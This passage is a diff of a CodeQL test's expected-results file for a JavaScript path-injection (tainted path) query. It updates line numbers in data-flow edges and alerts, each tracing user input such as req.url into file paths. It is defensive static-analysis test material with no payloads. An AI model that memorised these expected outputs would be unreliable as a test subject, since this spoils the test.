, true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | 
@@ -899,10 +899,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | 
@@ -944,69 +944,69 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... 
, true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | subpaths #select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. 
| TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... 
ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. 
| TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. 
| TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. 
| TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... 
'), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... 
e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. 
| TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. 
| TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... 
/g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. 
| TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. 
| express.js:8:20:8:32 | req.query.bar | user-provided value | | handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | | handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | 
@@ -1114,18 +1114,18 @@ subpaths | tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | | tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. 
